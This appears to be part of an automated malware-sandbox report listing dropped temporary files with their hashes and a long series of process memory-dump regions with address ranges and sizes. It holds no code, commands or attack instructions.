                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\zktxfav3\zktxfav3.0.cs

                                                                                    Filesize

                                                                                    1004B

                                                                                    MD5

                                                                                    c76055a0388b713a1eabe16130684dc3

                                                                                    SHA1

                                                                                    ee11e84cf41d8a43340f7102e17660072906c402

                                                                                    SHA256

                                                                                    8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                    SHA512

                                                                                    22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\zktxfav3\zktxfav3.cmdline

                                                                                    Filesize

                                                                                    607B

                                                                                    MD5

                                                                                    d9ae1cbc97648af411af80eb04bd2f40

                                                                                    SHA1

                                                                                    b35ebde4489f701e1dd6ca07f812f95e072dcd79

                                                                                    SHA256

                                                                                    69c61792f7919957f4fbcbc6a5f4e75a416c9ad863238f6d2651ef08e25b84c3

                                                                                    SHA512

                                                                                    eaa65fd862dc56e45a4683fd92a95c9407b54f0e7f08abfeb9f1b1a560c53e31fca9e95f008a5a83adbacbf47dcdb5f7cee3a11ecd09045fdead5948f003af2c

                                                                                  • memory/2448-205-0x000001A7BB0B0000-0x000001A7BB0B8000-memory.dmp

                                                                                    Filesize

                                                                                    32KB

                                                                                  • memory/4360-48-0x00007FF8BFA00000-0x00007FF8BFA0F000-memory.dmp

                                                                                    Filesize

                                                                                    60KB

                                                                                  • memory/4360-341-0x00007FF8A8930000-0x00007FF8A8A4C000-memory.dmp

                                                                                    Filesize

                                                                                    1.1MB

                                                                                  • memory/4360-74-0x00007FF8BC820000-0x00007FF8BC843000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/4360-118-0x00007FF8A86F0000-0x00007FF8A885F000-memory.dmp

                                                                                    Filesize

                                                                                    1.4MB

                                                                                  • memory/4360-105-0x00007FF8B7320000-0x00007FF8B7343000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/4360-71-0x00007FF8A8630000-0x00007FF8A86E8000-memory.dmp

                                                                                    Filesize

                                                                                    736KB

                                                                                  • memory/4360-72-0x00007FF8A82B0000-0x00007FF8A8625000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/4360-73-0x0000029AB9BB0000-0x0000029AB9F25000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/4360-70-0x00007FF8A8A50000-0x00007FF8A903A000-memory.dmp

                                                                                    Filesize

                                                                                    5.9MB

                                                                                  • memory/4360-64-0x00007FF8B7310000-0x00007FF8B731D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/4360-272-0x00007FF8B3870000-0x00007FF8B389E000-memory.dmp

                                                                                    Filesize

                                                                                    184KB

                                                                                  • memory/4360-66-0x00007FF8B3870000-0x00007FF8B389E000-memory.dmp

                                                                                    Filesize

                                                                                    184KB

                                                                                  • memory/4360-62-0x00007FF8B7CD0000-0x00007FF8B7CE9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/4360-60-0x00007FF8A86F0000-0x00007FF8A885F000-memory.dmp

                                                                                    Filesize

                                                                                    1.4MB

                                                                                  • memory/4360-58-0x00007FF8B7320000-0x00007FF8B7343000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/4360-56-0x00007FF8B7D40000-0x00007FF8B7D59000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/4360-54-0x00007FF8B80B0000-0x00007FF8B80DD000-memory.dmp

                                                                                    Filesize

                                                                                    180KB

                                                                                  • memory/4360-80-0x00007FF8A8930000-0x00007FF8A8A4C000-memory.dmp

                                                                                    Filesize

                                                                                    1.1MB

                                                                                  • memory/4360-76-0x00007FF8B72F0000-0x00007FF8B7304000-memory.dmp

                                                                                    Filesize

                                                                                    80KB

                                                                                  • memory/4360-30-0x00007FF8BC820000-0x00007FF8BC843000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/4360-25-0x00007FF8A8A50000-0x00007FF8A903A000-memory.dmp

                                                                                    Filesize

                                                                                    5.9MB

                                                                                  • memory/4360-78-0x00007FF8B6ED0000-0x00007FF8B6EDD000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/4360-287-0x00007FF8A8630000-0x00007FF8A86E8000-memory.dmp

                                                                                    Filesize

                                                                                    736KB

                                                                                  • memory/4360-342-0x00007FF8BC820000-0x00007FF8BC843000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/4360-289-0x00007FF8A82B0000-0x00007FF8A8625000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/4360-291-0x0000029AB9BB0000-0x0000029AB9F25000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/4360-312-0x00007FF8A8A50000-0x00007FF8A903A000-memory.dmp

                                                                                    Filesize

                                                                                    5.9MB

                                                                                  • memory/4360-326-0x00007FF8A8930000-0x00007FF8A8A4C000-memory.dmp

                                                                                    Filesize

                                                                                    1.1MB

                                                                                  • memory/4360-318-0x00007FF8A86F0000-0x00007FF8A885F000-memory.dmp

                                                                                    Filesize

                                                                                    1.4MB

                                                                                  • memory/4360-313-0x00007FF8BC820000-0x00007FF8BC843000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/4360-340-0x00007FF8B6ED0000-0x00007FF8B6EDD000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/4360-327-0x00007FF8A8A50000-0x00007FF8A903A000-memory.dmp

                                                                                    Filesize

                                                                                    5.9MB

                                                                                  • memory/4360-339-0x00007FF8B72F0000-0x00007FF8B7304000-memory.dmp

                                                                                    Filesize

                                                                                    80KB

                                                                                  • memory/4360-352-0x00007FF8A82B0000-0x00007FF8A8625000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/4360-192-0x00007FF8B7CD0000-0x00007FF8B7CE9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/4360-351-0x00007FF8A8630000-0x00007FF8A86E8000-memory.dmp

                                                                                    Filesize

                                                                                    736KB

                                                                                  • memory/4360-350-0x00007FF8B3870000-0x00007FF8B389E000-memory.dmp

                                                                                    Filesize

                                                                                    184KB

                                                                                  • memory/4360-349-0x00007FF8B7310000-0x00007FF8B731D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/4360-348-0x00007FF8B7CD0000-0x00007FF8B7CE9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/4360-347-0x00007FF8A86F0000-0x00007FF8A885F000-memory.dmp

                                                                                    Filesize

                                                                                    1.4MB

                                                                                  • memory/4360-346-0x00007FF8B7320000-0x00007FF8B7343000-memory.dmp

                                                                                    Filesize

                                                                                    140KB

                                                                                  • memory/4360-345-0x00007FF8B7D40000-0x00007FF8B7D59000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/4360-344-0x00007FF8B80B0000-0x00007FF8B80DD000-memory.dmp

                                                                                    Filesize

                                                                                    180KB

                                                                                  • memory/4360-343-0x00007FF8BFA00000-0x00007FF8BFA0F000-memory.dmp

                                                                                    Filesize

                                                                                    60KB

                                                                                  • memory/4716-81-0x0000022F7E3C0000-0x0000022F7E3E2000-memory.dmp

                                                                                    Filesize

                                                                                    136KB